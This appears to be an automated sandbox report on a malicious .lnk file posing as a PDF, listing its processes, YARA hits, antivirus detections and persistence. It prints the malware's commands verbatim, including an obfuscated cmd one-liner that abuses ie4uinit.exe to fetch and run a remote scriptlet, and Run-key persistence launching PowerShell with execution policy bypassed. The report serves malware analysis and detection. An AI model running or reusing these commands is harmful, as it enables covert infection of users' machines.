file	C:\Users\test22\AppData\Local\Temp\file.pdf.lnk

Creates a shortcut to an executable file (15 events)

file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk
file	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
file	C:\Users\test22\AppData\Local\Temp\file.pdf.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk

Creates a suspicious process (15 events)

cmdline	"C:\Windows\System32\cmd.exe" /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC
cmdline	reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f
cmdline	wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC
cmdline	cmd /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f
cmdline	"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f
cmdline	wmic process call create "C:\Users\test22\AppData\Local\Temp\ie4uinit.exe -BaseSettings"
cmdline	powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC
cmdline	"C:\Windows\System32\cmd.exe" /c wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC
cmdline	cmd /c wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC
cmdline	"C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" reg add 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v GoogleUpdate /t REG_SZ /d 'wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC' /f
cmdline	"C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC
cmdline	cmd /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC
cmdline	"C:\Windows\System32\cmd.exe" /v /c "set "U1=teslacar"&&call set "P2=!U1:~2,1!!U1:~1,1!!U1:~0,1!"&&call !P2! "H3=!U1:~5,1!!U1:~4,1!!U1:~3,1!!U1:~3,1!"&&!H3! !P2! "E4=["&&!H3! !P2! "n5=v"&&!H3! !P2! "D6=e"&&!H3! !P2! "H7=i"&&!H3! !P2! "R8=]"&&!H3! !P2! "i9=g"&&!H3! !P2! "y10=n"&&!H3! !P2! "H11=t"&&!H3! !P2! "f12=u"&&!H3! !P2! "F13=="&&!H3! !P2! "A14=o"&&!H3! !P2! "D15=w"&&!H3! !P2! "n16=s"&&!H3! !P2! "p17=d"&&!H3! !P2! "U18=A"&&!H3! !P2! "L19=E"&&!H3! !P2! "k20=0"&&!H3! !P2! "q21=f"&&!H3! !P2! "x22=a"&&!H3! !P2! "H23=l"&&!H3! !P2! "S24=."&&!H3! !P2! "U25=R"&&!H3! !P2! "o26=r"&&!H3! !P2! "y27=O"&&!H3! !P2! "n28=5"&&!H3! !P2! "B29=F"&&!H3! !P2! "D30=7"&&!H3! !P2! "h31=c"&&!H3! !P2! "F32=h"&&!H3! !P2! "R33=p"&&!H3! !P2! "h34=4"&&!H3! !P2! "q35=%"&&!H3! !P2! "v36=m"&&!H3! !P2! "c37=L"&&!H3! !P2! "i38=x"&&!H3! !P2! "A39=S"&&!H3! !P2! "n40=2"&&!H3! !P2! "x41=\"&&!H3! !P2! "x42=-"&@echo off & (for %t in ("!E4!!n5!!D6!rs!H7!on!R8!" "si!i9!!y10!a!H11!!f12!r!D6! !F13! $w!H7!!y10!d!A14!!D15!!n16! !y10!!H11!$" "!E4!d!D6!s!H11!i!y10!a!H11!i!A14!!y10!!p17!irs!R8!" "!U18!45!L19!=!k20!1" "!E4!!p17!e!q21!!x22!u!H23!t!H7!ns!H11!al!H23!!S24!w!H7!!y10!dow!n16!7!R8!" "Un!U25!!D6!!i9!ist!D6!!o26!!y27!CX!n16!=F07FD" "de!H23!!q21!!H7!!H23!e!n16!!F13!A4!n28!E" "!E4!!B29!!k20!!D30!!B29!D]" "%11%\!n16!!h31!Robj,NI,!F32!tt!R33!s://sh!x22!r!D6!f!H7!l!D6!!n16!!S24!c!D6!!y10!!H11!!D6!!o26!/TEST22-PC" "[!U18!!h34!5!L19!!R8!" "!H7!e!f12!ini%OAL!q35!f" "!E4!st!o26!i!y10!g!n16!!R8!" "s!D6!!o26!v!H7!!h31!e!y10!a!v36!e=' '" "!n16!!F32!or!H11!!n16!v!h31!!y10!a!v36!!D6!!F13!' '" "OA!c37!=t!S24!in") do echo %~t) > "C:\Users\test22\AppData\Local\Temp\ie!f12!i!y10!!H7!t.t!i38!!H11!" & copy /Y C:\Windows\!A39!ys!H11!e!v36!3!n40!!x41!ie4!f12!in!H7!!H11!!S24!e!i38!!D6! C:\Users\test22\AppData\Local\Temp\ & ren C:\Users\test22\AppData\Local\Temp!x41!!H7!!D6!u!H7!n!H7!!H11!!S24!txt i!D6!u!H7!!y10!!H7!!H11!.!H7!!y10!!q21! & s!H11!!x22!rt "" /mi!y10! wmic p!o26!!A14!!h31!e!n16!s !H3! c!o26!eate "C:\Users\test22\AppData\Local\Temp\!H7!!D6!4ui!y10!!H7!!H11!!S24!!D6!xe !x42!B!x22!!n16!e!A39!et!H11!in!i9!!n16!""
cmdline	wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" reg add 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v GoogleUpdate /t REG_SZ /d 'wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC' /f
cmdline	wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC

A process created a hidden window (5 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Aug. 21, 2024, 2:24 p.m.	show_type: 0 filepath_r: wscript parameters: "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC filepath: wscript	1	1
ShellExecuteExW Aug. 21, 2024, 2:24 p.m.	show_type: 0 filepath_r: wscript parameters: "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" reg add 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v GoogleUpdate /t REG_SZ /d 'wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC' /f filepath: wscript	1	1
ShellExecuteExW Aug. 21, 2024, 2:24 p.m.	show_type: 0 filepath_r: cmd parameters: /c wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC filepath: cmd	1	1
ShellExecuteExW Aug. 21, 2024, 2:24 p.m.	show_type: 0 filepath_r: cmd parameters: /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f filepath: cmd	1	1
ShellExecuteExW Aug. 21, 2024, 2:24 p.m.	show_type: 0 filepath_r: cmd parameters: /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC filepath: cmd	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (9 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Aug. 21, 2024, 2:24 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Aug. 21, 2024, 2:24 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Aug. 21, 2024, 2:24 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Aug. 21, 2024, 2:24 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Aug. 21, 2024, 2:24 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Aug. 21, 2024, 2:24 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Aug. 21, 2024, 2:24 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Aug. 21, 2024, 2:24 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Aug. 21, 2024, 2:24 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (40 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Uses Windows utilities for basic Windows functionality (7 events)

cmdline	reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f
cmdline	cmd /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f
cmdline	"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f
cmdline	wmic process call create "C:\Users\test22\AppData\Local\Temp\ie4uinit.exe -BaseSettings"
cmdline	"C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" reg add 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v GoogleUpdate /t REG_SZ /d 'wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC' /f
cmdline	"C:\Windows\System32\cmd.exe" /v /c "set "U1=teslacar"&&call set "P2=!U1:~2,1!!U1:~1,1!!U1:~0,1!"&&call !P2! "H3=!U1:~5,1!!U1:~4,1!!U1:~3,1!!U1:~3,1!"&&!H3! !P2! "E4=["&&!H3! !P2! "n5=v"&&!H3! !P2! "D6=e"&&!H3! !P2! "H7=i"&&!H3! !P2! "R8=]"&&!H3! !P2! "i9=g"&&!H3! !P2! "y10=n"&&!H3! !P2! "H11=t"&&!H3! !P2! "f12=u"&&!H3! !P2! "F13=="&&!H3! !P2! "A14=o"&&!H3! !P2! "D15=w"&&!H3! !P2! "n16=s"&&!H3! !P2! "p17=d"&&!H3! !P2! "U18=A"&&!H3! !P2! "L19=E"&&!H3! !P2! "k20=0"&&!H3! !P2! "q21=f"&&!H3! !P2! "x22=a"&&!H3! !P2! "H23=l"&&!H3! !P2! "S24=."&&!H3! !P2! "U25=R"&&!H3! !P2! "o26=r"&&!H3! !P2! "y27=O"&&!H3! !P2! "n28=5"&&!H3! !P2! "B29=F"&&!H3! !P2! "D30=7"&&!H3! !P2! "h31=c"&&!H3! !P2! "F32=h"&&!H3! !P2! "R33=p"&&!H3! !P2! "h34=4"&&!H3! !P2! "q35=%"&&!H3! !P2! "v36=m"&&!H3! !P2! "c37=L"&&!H3! !P2! "i38=x"&&!H3! !P2! "A39=S"&&!H3! !P2! "n40=2"&&!H3! !P2! "x41=\"&&!H3! !P2! "x42=-"&@echo off & (for %t in ("!E4!!n5!!D6!rs!H7!on!R8!" "si!i9!!y10!a!H11!!f12!r!D6! !F13! $w!H7!!y10!d!A14!!D15!!n16! !y10!!H11!$" "!E4!d!D6!s!H11!i!y10!a!H11!i!A14!!y10!!p17!irs!R8!" "!U18!45!L19!=!k20!1" "!E4!!p17!e!q21!!x22!u!H23!t!H7!ns!H11!al!H23!!S24!w!H7!!y10!dow!n16!7!R8!" "Un!U25!!D6!!i9!ist!D6!!o26!!y27!CX!n16!=F07FD" "de!H23!!q21!!H7!!H23!e!n16!!F13!A4!n28!E" "!E4!!B29!!k20!!D30!!B29!D]" "%11%\!n16!!h31!Robj,NI,!F32!tt!R33!s://sh!x22!r!D6!f!H7!l!D6!!n16!!S24!c!D6!!y10!!H11!!D6!!o26!/TEST22-PC" "[!U18!!h34!5!L19!!R8!" "!H7!e!f12!ini%OAL!q35!f" "!E4!st!o26!i!y10!g!n16!!R8!" "s!D6!!o26!v!H7!!h31!e!y10!a!v36!e=' '" "!n16!!F32!or!H11!!n16!v!h31!!y10!a!v36!!D6!!F13!' '" "OA!c37!=t!S24!in") do echo %~t) > "C:\Users\test22\AppData\Local\Temp\ie!f12!i!y10!!H7!t.t!i38!!H11!" & copy /Y C:\Windows\!A39!ys!H11!e!v36!3!n40!!x41!ie4!f12!in!H7!!H11!!S24!e!i38!!D6! C:\Users\test22\AppData\Local\Temp\ & ren C:\Users\test22\AppData\Local\Temp!x41!!H7!!D6!u!H7!n!H7!!H11!!S24!txt i!D6!u!H7!!y10!!H7!!H11!.!H7!!y10!!q21! & s!H11!!x22!rt "" /mi!y10! wmic p!o26!!A14!!h31!e!n16!s !H3! c!o26!eate "C:\Users\test22\AppData\Local\Temp\!H7!!D6!4ui!y10!!H7!!H11!!S24!!D6!xe !x42!B!x22!!n16!e!A39!et!H11!in!i9!!n16!""
cmdline	wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" reg add 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v GoogleUpdate /t REG_SZ /d 'wscript "C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\test22\AppData\Roaming\Adobe\merge.ps1' TEST22-PC' /f

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdate

reg_value

wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\file.pdf.lnk

File has been identified by 18 AntiVirus engines on VirusTotal as malicious (18 events)

VIPRE	Heur.BZC.YAX.Pantera.9.F038540C
Arcabit	Heur.BZC.YAX.Pantera.9.F038540C
ESET-NOD32	LNK/Agent.XL
Kaspersky	HEUR:Trojan.WinLNK.Agent.gen
BitDefender	Heur.BZC.YAX.Pantera.9.F038540C
MicroWorld-eScan	Heur.BZC.YAX.Pantera.9.F038540C
Emsisoft	Heur.BZC.YAX.Pantera.9.F038540C (B)
DrWeb	Trojan.MulDrop28.7944
FireEye	Heur.BZC.YAX.Pantera.9.F038540C
Sophos	Troj/LnkObf-H
Google	Detected
MAX	malware (ai score=87)
Kingsoft	Win32.Troj.Unknown.a
Microsoft	Trojan:Win32/Pantera.A!MTB
ZoneAlarm	HEUR:Trojan.WinLNK.Agent.gen
GData	Heur.BZC.YAX.Pantera.9.F038540C
VBA32	Trojan.Link.ShellCmd
Tencent	Win32.Trojan.Agent.Hdhl

Stores PowerShell commands in the registry likely for persistence (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExW Aug. 21, 2024, 2:24 p.m.	key_handle: 0x0000007c regkey_r: GoogleUpdate reg_type: 1 (REG_SZ) value: wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdate	1	0	0

Powershell script adds registry entries (1 event)

cmd

"c:\windows\system32\cmd.exe" /c powershell.exe -noprofile -executionpolicy bypass -file c:\users\test22\appdata\roaming\adobe\merge.ps1 test22-pcreg add "hkey_current_user\software\microsoft\windows\currentversion\run" /v googleupdate /t reg_sz /d "wscript c:\users\test22\appdata\roaming\adobe\run_all.vbs powershell.exe -noprofile -executionpolicy bypass -file "c:\users\test22\appdata\roaming\adobe\merge.ps1" test22-pc" /fwscript c:\users\test22\appdata\roaming\adobe\run_all.vbs powershell.exe -noprofile -executionpolicy bypass -file "c:\users\test22\appdata\roaming\adobe\merge.ps1" test22-pccmd /c reg add "hkey_current_user\software\microsoft\windows\currentversion\run" /v googleupdate /t reg_sz /d "wscript c:\users\test22\appdata\roaming\adobe\run_all.vbs powershell.exe -noprofile -executionpolicy bypass -file "c:\users\test22\appdata\roaming\adobe\merge.ps1" test22-pc" /f"c:\windows\system32\cmd.exe" /c reg add "hkey_current_user\software\microsoft\windows\currentversion\run" /v googleupdate /t reg_sz /d "wscript c:\users\test22\appdata\roaming\adobe\run_all.vbs powershell.exe -noprofile -executionpolicy bypass -file "c:\users\test22\appdata\roaming\adobe\merge.ps1" test22-pc" /fwmic process call create "c:\users\test22\appdata\local\temp\ie4uinit.exe -basesettings"powershell.exe -noprofile -executionpolicy bypass -file c:\users\test22\appdata\roaming\adobe\merge.ps1 test22-pcc:\users\test22\appdata\local\temp\file.pdf.lnk"c:\windows\system32\cmd.exe" /c wscript c:\users\test22\appdata\roaming\adobe\run_all.vbs powershell.exe -noprofile -executionpolicy bypass -file "c:\users\test22\appdata\roaming\adobe\merge.ps1" test22-pccmd /c wscript c:\users\test22\appdata\roaming\adobe\run_all.vbs powershell.exe -noprofile -executionpolicy bypass -file "c:\users\test22\appdata\roaming\adobe\merge.ps1" test22-pc"c:\windows\system32\wscript.exe" "c:\users\test22\appdata\roaming\adobe\run_all.vbs" reg add 'hkey_current_user\software\microsoft\windows\currentversion\run' /v googleupdate /t reg_sz /d 'wscript "c:\users\test22\appdata\roaming\adobe\run_all.vbs" powershell.exe -noprofile -executionpolicy bypass -file 'c:\users\test22\appdata\roaming\adobe\merge.ps1' test22-pc' /f"c:\windows\system32\wscript.exe" "c:\users\test22\appdata\roaming\adobe\run_all.vbs" wscript "c:\users\test22\appdata\roaming\adobe\run_all.vbs" powershell.exe -noprofile -executionpolicy bypass -file 'c:\users\test22\appdata\roaming\adobe\merge.ps1' test22-pccmd /c powershell.exe -noprofile -executionpolicy bypass -file c:\users\test22\appdata\roaming\adobe\merge.ps1 test22-pcc:\users\test22\appdata\local\temp\ie4uinit.exe -cleariconcache"c:\windows\system32\cmd.exe" /v /c "set "u1=teslacar"&&call set "p2=!u1:~2,1!!u1:~1,1!!u1:~0,1!"&&call !p2! "h3=!u1:~5,1!!u1:~4,1!!u1:~3,1!!u1:~3,1!"&&!h3! !p2! "e4=["&&!h3! !p2! "n5=v"&&!h3! !p2! "d6=e"&&!h3! !p2! "h7=i"&&!h3! !p2! "r8=]"&&!h3! !p2! "i9=g"&&!h3! !p2! "y10=n"&&!h3! !p2! "h11=t"&&!h3! !p2! "f12=u"&&!h3! !p2! "f13=="&&!h3! !p2! "a14=o"&&!h3! !p2! "d15=w"&&!h3! !p2! "n16=s"&&!h3! !p2! "p17=d"&&!h3! !p2! "u18=a"&&!h3! !p2! "l19=e"&&!h3! !p2! "k20=0"&&!h3! !p2! "q21=f"&&!h3! !p2! "x22=a"&&!h3! !p2! "h23=l"&&!h3! !p2! "s24=."&&!h3! !p2! "u25=r"&&!h3! !p2! "o26=r"&&!h3! !p2! "y27=o"&&!h3! !p2! "n28=5"&&!h3! !p2! "b29=f"&&!h3! !p2! "d30=7"&&!h3! !p2! "h31=c"&&!h3! !p2! "f32=h"&&!h3! !p2! "r33=p"&&!h3! !p2! "h34=4"&&!h3! !p2! "q35=%"&&!h3! !p2! "v36=m"&&!h3! !p2! "c37=l"&&!h3! !p2! "i38=x"&&!h3! !p2! "a39=s"&&!h3! !p2! "n40=2"&&!h3! !p2! "x41=\"&&!h3! !p2! "x42=-"&@echo off & (for %t in ("!e4!!n5!!d6!rs!h7!on!r8!" "si!i9!!y10!a!h11!!f12!r!d6! !f13! $w!h7!!y10!d!a14!!d15!!n16! !y10!!h11!$" "!e4!d!d6!s!h11!i!y10!a!h11!i!a14!!y10!!p17!irs!r8!" "!u18!45!l19!=!k20!1" "!e4!!p17!e!q21!!x22!u!h23!t!h7!ns!h11!al!h23!!s24!w!h7!!y10!dow!n16!7!r8!" "un!u25!!d6!!i9!ist!d6!!o26!!y27!cx!n16!=f07fd" "de!h23!!q21!!h7!!h23!e!n16!!f13!a4!n28!e" "!e4!!b29!!k20!!d30!!b29!d]" "%11%\!n16!!h31!robj,ni,!f32!tt!r33!s://sh!x22!r!d6!f!h7!l!d6!!n16!!s24!c!d6!!y10!!h11!!d6!!o26!/test22-pc" "[!u18!!h34!5!l19!!r8!" "!h7!e!f12!ini%oal!q35!f" "!e4!st!o26!i!y10!g!n16!!r8!" "s!d6!!o26!v!h7!!h31!e!y10!a!v36!e=' '" "!n16!!f32!or!h11!!n16!v!h31!!y10!a!v36!!d6!!f13!' '" "oa!c37!=t!s24!in") do echo %~t) > "c:\users\test22\appdata\local\temp\ie!f12!i!y10!!h7!t.t!i38!!h11!" & copy /y c:\windows\!a39!ys!h11!e!v36!3!n40!!x41!ie4!f12!in!h7!!h11!!s24!e!i38!!d6! c:\users\test22\appdata\local\temp\ & ren c:\users\test22\appdata\local\temp!x41!!h7!!d6!u!h7!n!h7!!h11!!s24!txt i!d6!u!h7!!y10!!h7!!h11!.!h7!!y10!!q21! & s!h11!!x22!rt "" /mi!y10! wmic p!o26!!a14!!h31!e!n16!s !h3! c!o26!eate "c:\users\test22\appdata\local\temp\!h7!!d6!4ui!y10!!h7!!h11!!s24!!d6!xe !x42!b!x22!!n16!e!a39!et!h11!in!i9!!n16!""wscript "c:\users\test22\appdata\roaming\adobe\run_all.vbs" reg add 'hkey_current_user\software\microsoft\windows\currentversion\run' /v googleupdate /t reg_sz /d 'wscript "c:\users\test22\appdata\roaming\adobe\run_all.vbs" powershell.exe -noprofile -executionpolicy bypass -file 'c:\users\test22\appdata\roaming\adobe\merge.ps1' test22-pc' /fwscript "c:\users\test22\appdata\roaming\adobe\run_all.vbs" wscript "c:\users\test22\appdata\roaming\adobe\run_all.vbs" powershell.exe -noprofile -executionpolicy bypass -file 'c:\users\test22\appdata\roaming\adobe\merge.ps1' test22-pc

One or more non-whitelisted processes were created (6 events)

parent_process	wscript.exe	martian_process	cmd /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC
parent_process	wscript.exe	martian_process	cmd /c wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC
parent_process	wscript.exe	martian_process	cmd /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (7 events)

Time & API	Arguments	Status	Return
